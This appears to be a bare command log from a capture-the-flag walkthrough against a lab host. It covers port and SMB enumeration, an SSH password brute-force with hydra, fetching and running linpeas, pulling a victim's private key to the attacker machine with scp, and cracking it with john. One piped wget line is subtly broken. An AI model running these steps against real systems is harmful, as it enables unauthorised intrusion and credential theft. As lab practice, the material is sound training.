No other ports found.
nmap -sV -sT -O -p 1-65535 $VICTIM
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt
nmap $VICTIM --script=smb-enum*
smbclient -L //$VICTIM/ -U anonymous
We found a file that has two possible usernames. In the note above it mentioned someone with J in their name has a weak password.
smbclient \\\\$VICTIM\\Anonymous -U anonymous
prompt
mget *
exit
cat staff.txt
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://$VICTIM
ssh jan@$VICTIM
Password: armando
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
scp id_rsa root@$KALI:/root/loot
chmod 400 id_rsa
ssh -i id_rsa kay@$VICTIM
/opt/john/ssh2john.py id_rsa > pass_hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt pass_hash.txt
ssh -i id_rsa kay@$VICTIM
Password: beeswax